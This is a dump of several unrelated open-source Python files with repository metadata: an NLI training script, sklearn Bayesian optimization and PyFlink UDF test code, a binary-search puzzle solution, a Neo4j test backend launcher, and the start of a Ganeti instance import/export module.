lukecq1231/sent_enc_nli_sick
e71e6f245591214168ee8ff1588d1e8b866d7e2c
[ "BSD-3-Clause" ]
null
null
null
import numpy import os from nli import train if __name__ == '__main__': model_name = os.path.basename(os.path.dirname(os.path.realpath(__file__))) train( saveto = './{}.npz'.format(model_name), reload_ = False, dim_word = 300, dim = 300, patience = 3, n_words = 2260, decay_c = 0., clip_c = 10., lrate = 0.0004, optimizer = 'adadelta', maxlen = 100, batch_size = 32, valid_batch_size = 32, dispFreq = 10, validFreq = 1000, saveFreq = 1000, use_dropout = True, verbose = False, datasets = ['../../data/word_sequence/premise_SICK_train.txt.tok', '../../data/word_sequence/hypothesis_SICK_train.txt.tok', '../../data/word_sequence/label_SICK_train.txt'], valid_datasets = ['../../data/word_sequence/premise_SICK_trial.txt.tok', '../../data/word_sequence/hypothesis_SICK_trial.txt.tok', '../../data/word_sequence/label_SICK_trial.txt'], test_datasets = ['../../data/word_sequence/premise_SICK_test_annotated.txt.tok', '../../data/word_sequence/hypothesis_SICK_test_annotated.txt.tok', '../../data/word_sequence/label_SICK_test_annotated.txt'], dictionary = '../../data/word_sequence/vocab_cased.pkl', # embedding = '../../data/glove/glove.840B.300d.txt', )
38.585366
90
0.529077
795a7d3140d84acc5d6ae0c35e5e706441210438
83
py
Python
src/dependency_injector/__init__.py
kootoopas/python-dependency-injector
47278030ce1b4e06b6d4b21af4d0ebbfa178c815
[ "BSD-3-Clause" ]
null
null
null
src/dependency_injector/__init__.py
kootoopas/python-dependency-injector
47278030ce1b4e06b6d4b21af4d0ebbfa178c815
[ "BSD-3-Clause" ]
null
null
null
src/dependency_injector/__init__.py
kootoopas/python-dependency-injector
47278030ce1b4e06b6d4b21af4d0ebbfa178c815
[ "BSD-3-Clause" ]
null
null
null
"""Top-level package.""" __version__ = '4.5.4' """Version number. :type: str """
10.375
24
0.590361
795a7e64235facb0a785a1e877d5ed0e6982eece
1,672
py
Python
examples/sklearn_example.py
petehellyer/BayesianOptimization
b79d5f174b930e94d12a480e936f2029d9468ca7
[ "MIT" ]
null
null
null
examples/sklearn_example.py
petehellyer/BayesianOptimization
b79d5f174b930e94d12a480e936f2029d9468ca7
[ "MIT" ]
null
null
null
examples/sklearn_example.py
petehellyer/BayesianOptimization
b79d5f174b930e94d12a480e936f2029d9468ca7
[ "MIT" ]
null
null
null
from __future__ import print_function from __future__ import division from sklearn.datasets import make_classification from sklearn.cross_validation import cross_val_score from sklearn.ensemble import RandomForestClassifier as RFC from sklearn.svm import SVC from bayes_opt import BayesianOptimization # Load data set and target values data, target = make_classification(n_samples=2500, n_features=45, n_informative=12, n_redundant=7) def svccv(C, gamma): return cross_val_score(SVC(C=C, gamma=gamma, random_state=2), data, target, 'f1', cv=5).mean() def rfccv(n_estimators, min_samples_split, max_features): return cross_val_score(RFC(n_estimators=int(n_estimators), min_samples_split=int(min_samples_split), max_features=min(max_features, 0.999), random_state=2), data, target, 'f1', cv=5).mean() if __name__ == "__main__": svcBO = BayesianOptimization(svccv, {'C': (0.001, 100), 'gamma': (0.0001, 0.1)}) svcBO.explore({'C': [0.001, 0.01, 0.1], 'gamma': [0.001, 0.01, 0.1]}) rfcBO = BayesianOptimization(rfccv, {'n_estimators': (10, 250), 'min_samples_split': (2, 25), 'max_features': (0.1, 0.999)}) svcBO.maximize() print('-'*53) rfcBO.maximize() print('-'*53) print('Final Results') print('SVC: %f' % svcBO.res['max']['max_val']) print('RFC: %f' % rfcBO.res['max']['max_val'])
38
84
0.572368
795a7f51aab69efedb248b9392679b2d9ca19fbf
566
py
Python
Silver/Silver_IV/1920.py
masterTyper/baekjoon_solved_ac
b9ce14d9bdaa5b5b06735ad075fb827de9f44b9c
[ "MIT" ]
null
null
null
Silver/Silver_IV/1920.py
masterTyper/baekjoon_solved_ac
b9ce14d9bdaa5b5b06735ad075fb827de9f44b9c
[ "MIT" ]
null
null
null
Silver/Silver_IV/1920.py
masterTyper/baekjoon_solved_ac
b9ce14d9bdaa5b5b06735ad075fb827de9f44b9c
[ "MIT" ]
null
null
null
import sys N = int(sys.stdin.readline()) A = list(map(int, sys.stdin.readline().split())) M = int(sys.stdin.readline()) E = list(map(int, sys.stdin.readline().split())) A.sort() def binary_search(target): start = 0 end = len(A) - 1 while start <= end: mid = (start + end) // 2 if A[mid] == target: return True elif A[mid] < target: start = mid + 1 else: end = mid - 1 return None for i in range(M): if binary_search(E[i]): print(1) else: print(0)
16.171429
48
0.512367
795a821baec697441c80d18eb0ed8ad2a2fe4ed7
430
py
Python
testkit/backend.py
mrhardikjoshi/neo4j-ruby-driver
b182011bbc3bca2c7c79e5917a87654bef0fbfde
[ "MIT" ]
null
null
null
testkit/backend.py
mrhardikjoshi/neo4j-ruby-driver
b182011bbc3bca2c7c79e5917a87654bef0fbfde
[ "MIT" ]
null
null
null
testkit/backend.py
mrhardikjoshi/neo4j-ruby-driver
b182011bbc3bca2c7c79e5917a87654bef0fbfde
[ "MIT" ]
null
null
null
""" Executed in Ruby driver container. Assumes driver and backend has been built. Responsible for starting the test backend. """ import os, subprocess if __name__ == "__main__": err = open("/artifacts/backenderr.log", "w") out = open("/artifacts/backendout.log", "w") subprocess.check_call( ['env', 'driver=%s' % os.environ.get("TEST_DRIVER_PLATFORM", 'ruby'), "bin/testkit-backend"], stdout=out, stderr=err)
33.076923
125
0.690698
795a826cc420f2e82a3c31d9a539f8612a6e1aa3
26,667
py
Python
flink-python/pyflink/table/tests/test_udf.py
zhangxiangyang/flink
e8ea52b90e3ac8cd30cb20a44394388a1ef21f0b
[ "Apache-2.0" ]
2
2020-01-09T06:58:29.000Z
2020-01-09T06:58:32.000Z
flink-python/pyflink/table/tests/test_udf.py
zhangxiangyang/flink
e8ea52b90e3ac8cd30cb20a44394388a1ef21f0b
[ "Apache-2.0" ]
1
2020-05-19T08:20:26.000Z
2020-05-19T08:20:26.000Z
flink-python/pyflink/table/tests/test_udf.py
zhangxiangyang/flink
e8ea52b90e3ac8cd30cb20a44394388a1ef21f0b
[ "Apache-2.0" ]
1
2020-03-06T22:58:05.000Z
2020-03-06T22:58:05.000Z
################################################################################ # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ################################################################################ from pyflink.table import DataTypes from pyflink.table.udf import ScalarFunction, udf from pyflink.testing import source_sink_utils from pyflink.testing.test_case_utils import PyFlinkStreamTableTestCase, \ PyFlinkBlinkStreamTableTestCase, PyFlinkBlinkBatchTableTestCase class UserDefinedFunctionTests(object): def test_scalar_function(self): # test lambda function self.t_env.register_function( "add_one", udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT())) # test Python ScalarFunction self.t_env.register_function( "subtract_one", udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT())) # test Python function self.t_env.register_function("add", add) # test callable function self.t_env.register_function( "add_one_callable", udf(CallablePlus(), DataTypes.BIGINT(), DataTypes.BIGINT())) def partial_func(col, param): return col + param # test partial function import functools self.t_env.register_function( "add_one_partial", udf(functools.partial(partial_func, param=1), DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = 
source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd', 'e', 'f'], [DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 3), (2, 5, 6), (3, 1, 9)], ['a', 'b', 'c']) t.where("add_one(b) <= 3") \ .select("add_one(a), subtract_one(b), add(a, c), add_one_callable(a), " "add_one_partial(a), a") \ .insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2,1,4,2,2,1", "4,0,12,4,4,3"]) def test_chaining_scalar_function(self): self.t_env.register_function( "add_one", udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT())) self.t_env.register_function( "subtract_one", udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT())) self.t_env.register_function("add", add) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c'], [DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.INT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 1), (2, 5, 2), (3, 1, 3)], ['a', 'b', 'c']) t.select("add(add_one(a), subtract_one(b)), c, 1") \ .insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["3,1,1", "7,2,1", "4,3,1"]) def test_udf_in_join_condition(self): t1 = self.t_env.from_elements([(2, "Hi")], ['a', 'b']) t2 = self.t_env.from_elements([(2, "Flink")], ['c', 'd']) self.t_env.register_function("f", udf(lambda i: i, DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd'], [DataTypes.BIGINT(), DataTypes.STRING(), DataTypes.BIGINT(), DataTypes.STRING()]) self.t_env.register_table_sink("Results", table_sink) t1.join(t2).where("f(a) = c").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2,Hi,2,Flink"]) def test_udf_in_join_condition_2(self): t1 = 
self.t_env.from_elements([(1, "Hi"), (2, "Hi")], ['a', 'b']) t2 = self.t_env.from_elements([(2, "Flink")], ['c', 'd']) self.t_env.register_function("f", udf(lambda i: i, DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd'], [DataTypes.BIGINT(), DataTypes.STRING(), DataTypes.BIGINT(), DataTypes.STRING()]) self.t_env.register_table_sink("Results", table_sink) t1.join(t2).where("f(a) = f(c)").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2,Hi,2,Flink"]) def test_udf_with_constant_params(self): def udf_with_constant_params(p, null_param, tinyint_param, smallint_param, int_param, bigint_param, decimal_param, float_param, double_param, boolean_param, str_param, date_param, time_param, timestamp_param): from decimal import Decimal import datetime assert null_param is None, 'null_param is wrong value %s' % null_param assert isinstance(tinyint_param, int), 'tinyint_param of wrong type %s !' \ % type(tinyint_param) p += tinyint_param assert isinstance(smallint_param, int), 'smallint_param of wrong type %s !' \ % type(smallint_param) p += smallint_param assert isinstance(int_param, int), 'int_param of wrong type %s !' \ % type(int_param) p += int_param assert isinstance(bigint_param, int), 'bigint_param of wrong type %s !' 
\ % type(bigint_param) p += bigint_param assert decimal_param == Decimal('1.05'), \ 'decimal_param is wrong value %s ' % decimal_param p += int(decimal_param) assert isinstance(float_param, float) and float_equal(float_param, 1.23, 1e-06), \ 'float_param is wrong value %s ' % float_param p += int(float_param) assert isinstance(double_param, float) and float_equal(double_param, 1.98932, 1e-07), \ 'double_param is wrong value %s ' % double_param p += int(double_param) assert boolean_param is True, 'boolean_param is wrong value %s' % boolean_param assert str_param == 'flink', 'str_param is wrong value %s' % str_param assert date_param == datetime.date(year=2014, month=9, day=13), \ 'date_param is wrong value %s' % date_param assert time_param == datetime.time(hour=12, minute=0, second=0), \ 'time_param is wrong value %s' % time_param assert timestamp_param == datetime.datetime(1999, 9, 10, 5, 20, 10), \ 'timestamp_param is wrong value %s' % timestamp_param return p self.t_env.register_function("udf_with_constant_params", udf(udf_with_constant_params, input_types=[DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.TINYINT(), DataTypes.SMALLINT(), DataTypes.INT(), DataTypes.BIGINT(), DataTypes.DECIMAL(20, 10), DataTypes.FLOAT(), DataTypes.DOUBLE(), DataTypes.BOOLEAN(), DataTypes.STRING(), DataTypes.DATE(), DataTypes.TIME(), DataTypes.TIMESTAMP()], result_type=DataTypes.BIGINT())) self.t_env.register_function( "udf_with_all_constant_params", udf(lambda i, j: i + j, [DataTypes.BIGINT(), DataTypes.BIGINT()], DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink(['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 3), (2, 5, 6), (3, 1, 9)], ['a', 'b', 'c']) self.t_env.register_table("test_table", t) self.t_env.sql_query("select udf_with_all_constant_params(" "cast (1 as BIGINT)," "cast (2 as BIGINT)), " "udf_with_constant_params(a, " "cast (null as BIGINT)," "cast (1 as 
TINYINT)," "cast (1 as SMALLINT)," "cast (1 as INT)," "cast (1 as BIGINT)," "cast (1.05 as DECIMAL)," "cast (1.23 as FLOAT)," "cast (1.98932 as DOUBLE)," "true," "'flink'," "cast ('2014-09-13' as DATE)," "cast ('12:00:00' as TIME)," "cast ('1999-9-10 05:20:10' as TIMESTAMP))" " from test_table").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["3,8", "3,9", "3,10"]) def test_overwrite_builtin_function(self): self.t_env.register_function( "plus", udf(lambda i, j: i + j - 1, [DataTypes.BIGINT(), DataTypes.BIGINT()], DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink(['a'], [DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 3), (2, 5, 6), (3, 1, 9)], ['a', 'b', 'c']) t.select("plus(a, b)").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2", "6", "3"]) def test_open(self): self.t_env.register_function( "subtract", udf(Subtract(), DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink( ['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2), (2, 5), (3, 4)], ['a', 'b']) t.select("a, subtract(b)").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["1,1", "2,4", "3,3"]) def test_udf_without_arguments(self): self.t_env.register_function("one", udf( lambda: 1, input_types=[], result_type=DataTypes.BIGINT(), deterministic=True)) self.t_env.register_function("two", udf( lambda: 2, input_types=[], result_type=DataTypes.BIGINT(), deterministic=False)) table_sink = source_sink_utils.TestAppendSink(['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b']) t.select("one(), 
two()").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["1,2", "1,2", "1,2"]) def test_all_data_types(self): def boolean_func(bool_param): assert isinstance(bool_param, bool), 'bool_param of wrong type %s !' \ % type(bool_param) return bool_param def tinyint_func(tinyint_param): assert isinstance(tinyint_param, int), 'tinyint_param of wrong type %s !' \ % type(tinyint_param) return tinyint_param def smallint_func(smallint_param): assert isinstance(smallint_param, int), 'smallint_param of wrong type %s !' \ % type(smallint_param) assert smallint_param == 32767, 'smallint_param of wrong value %s' % smallint_param return smallint_param def int_func(int_param): assert isinstance(int_param, int), 'int_param of wrong type %s !' \ % type(int_param) assert int_param == -2147483648, 'int_param of wrong value %s' % int_param return int_param def bigint_func(bigint_param): assert isinstance(bigint_param, int), 'bigint_param of wrong type %s !' \ % type(bigint_param) return bigint_param def bigint_func_none(bigint_param): assert bigint_param is None, 'bigint_param %s should be None!' % bigint_param return bigint_param def float_func(float_param): assert isinstance(float_param, float) and float_equal(float_param, 1.23, 1e-6), \ 'float_param is wrong value %s !' % float_param return float_param def double_func(double_param): assert isinstance(double_param, float) and float_equal(double_param, 1.98932, 1e-7), \ 'double_param is wrong value %s !' % double_param return double_param def bytes_func(bytes_param): assert bytes_param == b'flink', \ 'bytes_param is wrong value %s !' % bytes_param return bytes_param def str_func(str_param): assert str_param == 'pyflink', \ 'str_param is wrong value %s !' % str_param return str_param def date_func(date_param): from datetime import date assert date_param == date(year=2014, month=9, day=13), \ 'date_param is wrong value %s !' 
% date_param return date_param def time_func(time_param): from datetime import time assert time_param == time(hour=12, minute=0, second=0, microsecond=123000), \ 'time_param is wrong value %s !' % time_param return time_param def timestamp_func(timestamp_param): from datetime import datetime assert timestamp_param == datetime(2018, 3, 11, 3, 0, 0, 123000), \ 'timestamp_param is wrong value %s !' % timestamp_param return timestamp_param def array_func(array_param): assert array_param == [[1, 2, 3]], \ 'array_param is wrong value %s !' % array_param return array_param[0] def map_func(map_param): assert map_param == {1: 'flink', 2: 'pyflink'}, \ 'map_param is wrong value %s !' % map_param return map_param def decimal_func(decimal_param): from decimal import Decimal assert decimal_param == Decimal('1000000000000000000.050000000000000000'), \ 'decimal_param is wrong value %s !' % decimal_param return decimal_param def decimal_cut_func(decimal_param): from decimal import Decimal assert decimal_param == Decimal('1000000000000000000.059999999999999999'), \ 'decimal_param is wrong value %s !' 
% decimal_param return decimal_param self.t_env.register_function( "boolean_func", udf(boolean_func, [DataTypes.BOOLEAN()], DataTypes.BOOLEAN())) self.t_env.register_function( "tinyint_func", udf(tinyint_func, [DataTypes.TINYINT()], DataTypes.TINYINT())) self.t_env.register_function( "smallint_func", udf(smallint_func, [DataTypes.SMALLINT()], DataTypes.SMALLINT())) self.t_env.register_function( "int_func", udf(int_func, [DataTypes.INT()], DataTypes.INT())) self.t_env.register_function( "bigint_func", udf(bigint_func, [DataTypes.BIGINT()], DataTypes.BIGINT())) self.t_env.register_function( "bigint_func_none", udf(bigint_func_none, [DataTypes.BIGINT()], DataTypes.BIGINT())) self.t_env.register_function( "float_func", udf(float_func, [DataTypes.FLOAT()], DataTypes.FLOAT())) self.t_env.register_function( "double_func", udf(double_func, [DataTypes.DOUBLE()], DataTypes.DOUBLE())) self.t_env.register_function( "bytes_func", udf(bytes_func, [DataTypes.BYTES()], DataTypes.BYTES())) self.t_env.register_function( "str_func", udf(str_func, [DataTypes.STRING()], DataTypes.STRING())) self.t_env.register_function( "date_func", udf(date_func, [DataTypes.DATE()], DataTypes.DATE())) self.t_env.register_function( "time_func", udf(time_func, [DataTypes.TIME(3)], DataTypes.TIME(3))) self.t_env.register_function( "timestamp_func", udf(timestamp_func, [DataTypes.TIMESTAMP()], DataTypes.TIMESTAMP())) self.t_env.register_function( "array_func", udf(array_func, [DataTypes.ARRAY(DataTypes.ARRAY(DataTypes.BIGINT()))], DataTypes.ARRAY(DataTypes.BIGINT()))) self.t_env.register_function( "map_func", udf(map_func, [DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING())], DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING()))) self.t_env.register_function( "decimal_func", udf(decimal_func, [DataTypes.DECIMAL(38, 18)], DataTypes.DECIMAL(38, 18))) self.t_env.register_function( "decimal_cut_func", udf(decimal_cut_func, [DataTypes.DECIMAL(38, 18)], DataTypes.DECIMAL(38, 18))) table_sink = 
source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q'], [DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.TINYINT(), DataTypes.BOOLEAN(), DataTypes.SMALLINT(), DataTypes.INT(), DataTypes.FLOAT(), DataTypes.DOUBLE(), DataTypes.BYTES(), DataTypes.STRING(), DataTypes.DATE(), DataTypes.TIME(3), DataTypes.TIMESTAMP(), DataTypes.ARRAY(DataTypes.BIGINT()), DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING()), DataTypes.DECIMAL(38, 18), DataTypes.DECIMAL(38, 18)]) self.t_env.register_table_sink("Results", table_sink) import datetime import decimal t = self.t_env.from_elements( [(1, None, 1, True, 32767, -2147483648, 1.23, 1.98932, bytearray(b'flink'), 'pyflink', datetime.date(2014, 9, 13), datetime.time(hour=12, minute=0, second=0, microsecond=123000), datetime.datetime(2018, 3, 11, 3, 0, 0, 123000), [[1, 2, 3]], {1: 'flink', 2: 'pyflink'}, decimal.Decimal('1000000000000000000.05'), decimal.Decimal('1000000000000000000.05999999999999999899999999999'))], DataTypes.ROW( [DataTypes.FIELD("a", DataTypes.BIGINT()), DataTypes.FIELD("b", DataTypes.BIGINT()), DataTypes.FIELD("c", DataTypes.TINYINT()), DataTypes.FIELD("d", DataTypes.BOOLEAN()), DataTypes.FIELD("e", DataTypes.SMALLINT()), DataTypes.FIELD("f", DataTypes.INT()), DataTypes.FIELD("g", DataTypes.FLOAT()), DataTypes.FIELD("h", DataTypes.DOUBLE()), DataTypes.FIELD("i", DataTypes.BYTES()), DataTypes.FIELD("j", DataTypes.STRING()), DataTypes.FIELD("k", DataTypes.DATE()), DataTypes.FIELD("l", DataTypes.TIME(3)), DataTypes.FIELD("m", DataTypes.TIMESTAMP()), DataTypes.FIELD("n", DataTypes.ARRAY(DataTypes.ARRAY(DataTypes.BIGINT()))), DataTypes.FIELD("o", DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING())), DataTypes.FIELD("p", DataTypes.DECIMAL(38, 18)), DataTypes.FIELD("q", DataTypes.DECIMAL(38, 18))])) t.select("bigint_func(a), bigint_func_none(b)," "tinyint_func(c), boolean_func(d)," "smallint_func(e),int_func(f)," "float_func(g),double_func(h)," 
"bytes_func(i),str_func(j)," "date_func(k),time_func(l)," "timestamp_func(m),array_func(n)," "map_func(o),decimal_func(p)," "decimal_cut_func(q)") \ .insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() # Currently the sink result precision of DataTypes.TIME(precision) only supports 0. self.assert_equals(actual, ["1,null,1,true,32767,-2147483648,1.23,1.98932," "[102, 108, 105, 110, 107],pyflink,2014-09-13," "12:00:00,2018-03-11 03:00:00.123,[1, 2, 3]," "{1=flink, 2=pyflink},1000000000000000000.050000000000000000," "1000000000000000000.059999999999999999"]) # decide whether two floats are equal def float_equal(a, b, rel_tol=1e-09, abs_tol=0.0): return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol) class PyFlinkStreamUserDefinedFunctionTests(UserDefinedFunctionTests, PyFlinkStreamTableTestCase): pass class PyFlinkBlinkStreamUserDefinedFunctionTests(UserDefinedFunctionTests, PyFlinkBlinkStreamTableTestCase): def test_deterministic(self): add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertTrue(add_one._deterministic) add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT(), deterministic=False) self.assertFalse(add_one._deterministic) subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertTrue(subtract_one._deterministic) with self.assertRaises(ValueError, msg="Inconsistent deterministic: False and True"): udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT(), deterministic=False) self.assertTrue(add._deterministic) @udf(input_types=DataTypes.BIGINT(), result_type=DataTypes.BIGINT(), deterministic=False) def non_deterministic_udf(i): return i self.assertFalse(non_deterministic_udf._deterministic) def test_name(self): add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertEqual("<lambda>", add_one._name) add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT(), name="add_one") self.assertEqual("add_one", 
add_one._name) subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertEqual("SubtractOne", subtract_one._name) subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT(), name="subtract_one") self.assertEqual("subtract_one", subtract_one._name) self.assertEqual("add", add._name) @udf(input_types=DataTypes.BIGINT(), result_type=DataTypes.BIGINT(), name="named") def named_udf(i): return i self.assertEqual("named", named_udf._name) def test_abc(self): class UdfWithoutEval(ScalarFunction): def open(self, function_context): pass with self.assertRaises( TypeError, msg="Can't instantiate abstract class UdfWithoutEval with abstract methods eval"): UdfWithoutEval() def test_invalid_udf(self): class Plus(object): def eval(self, col): return col + 1 with self.assertRaises( TypeError, msg="Invalid function: not a function or callable (__call__ is not defined)"): # test non-callable function self.t_env.register_function( "non-callable-udf", udf(Plus(), DataTypes.BIGINT(), DataTypes.BIGINT())) class PyFlinkBlinkBatchUserDefinedFunctionTests(UserDefinedFunctionTests, PyFlinkBlinkBatchTableTestCase): pass @udf(input_types=[DataTypes.BIGINT(), DataTypes.BIGINT()], result_type=DataTypes.BIGINT()) def add(i, j): return i + j class SubtractOne(ScalarFunction): def eval(self, i): return i - 1 class Subtract(ScalarFunction): def __init__(self): self.subtracted_value = 0 def open(self, function_context): self.subtracted_value = 1 def eval(self, i): return i - self.subtracted_value class CallablePlus(object): def __call__(self, col): return col + 1 if __name__ == '__main__': import unittest try: import xmlrunner testRunner = xmlrunner.XMLTestRunner(output='target/test-reports') except ImportError: testRunner = None unittest.main(testRunner=testRunner, verbosity=2)
45.045608
99
0.562305
795a83a9b9918a8db1196bbebad79714932c1d29
48,773
py
Python
lib/masterd/instance.py
apyrgio/snf-ganeti
c59bb92f5bf4a98d90b4f10fb509a5a2f11c65b7
[ "BSD-2-Clause" ]
null
null
null
lib/masterd/instance.py
apyrgio/snf-ganeti
c59bb92f5bf4a98d90b4f10fb509a5a2f11c65b7
[ "BSD-2-Clause" ]
null
null
null
lib/masterd/instance.py
apyrgio/snf-ganeti
c59bb92f5bf4a98d90b4f10fb509a5a2f11c65b7
[ "BSD-2-Clause" ]
null
null
null
# # # Copyright (C) 2010, 2011 Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Instance-related functions and classes for masterd. """ import logging import time import OpenSSL from ganeti import constants from ganeti import errors from ganeti import compat from ganeti import utils from ganeti import objects from ganeti import netutils from ganeti import pathutils class _ImportExportError(Exception): """Local exception to report import/export errors. 
""" class ImportExportTimeouts(object): #: Time until daemon starts writing status file DEFAULT_READY_TIMEOUT = 10 #: Length of time until errors cause hard failure DEFAULT_ERROR_TIMEOUT = 10 #: Time after which daemon must be listening DEFAULT_LISTEN_TIMEOUT = 10 #: Progress update interval DEFAULT_PROGRESS_INTERVAL = 60 __slots__ = [ "error", "ready", "listen", "connect", "progress", ] def __init__(self, connect, listen=DEFAULT_LISTEN_TIMEOUT, error=DEFAULT_ERROR_TIMEOUT, ready=DEFAULT_READY_TIMEOUT, progress=DEFAULT_PROGRESS_INTERVAL): """Initializes this class. @type connect: number @param connect: Timeout for establishing connection @type listen: number @param listen: Timeout for starting to listen for connections @type error: number @param error: Length of time until errors cause hard failure @type ready: number @param ready: Timeout for daemon to become ready @type progress: number @param progress: Progress update interval """ self.error = error self.ready = ready self.listen = listen self.connect = connect self.progress = progress class ImportExportCbBase(object): """Callbacks for disk import/export. """ def ReportListening(self, ie, private, component): """Called when daemon started listening. @type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object @param component: transfer component name """ def ReportConnected(self, ie, private): """Called when a connection has been established. @type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object """ def ReportProgress(self, ie, private): """Called when new progress information should be reported. @type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object """ def ReportFinished(self, ie, private): """Called when a transfer has finished. 
@type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object """ class _DiskImportExportBase(object): MODE_TEXT = None def __init__(self, lu, node_uuid, opts, instance, component, timeouts, cbs, private=None): """Initializes this class. @param lu: Logical unit instance @type node_uuid: string @param node_uuid: Node UUID for import @type opts: L{objects.ImportExportOptions} @param opts: Import/export daemon options @type instance: L{objects.Instance} @param instance: Instance object @type component: string @param component: which part of the instance is being imported @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import @type cbs: L{ImportExportCbBase} @param cbs: Callbacks @param private: Private data for callback functions """ assert self.MODE_TEXT self._lu = lu self.node_uuid = node_uuid self.node_name = lu.cfg.GetNodeName(node_uuid) self._opts = opts.Copy() self._instance = instance self._component = component self._timeouts = timeouts self._cbs = cbs self._private = private # Set master daemon's timeout in options for import/export daemon assert self._opts.connect_timeout is None self._opts.connect_timeout = timeouts.connect # Parent loop self._loop = None # Timestamps self._ts_begin = None self._ts_connected = None self._ts_finished = None self._ts_cleanup = None self._ts_last_progress = None self._ts_last_error = None # Transfer status 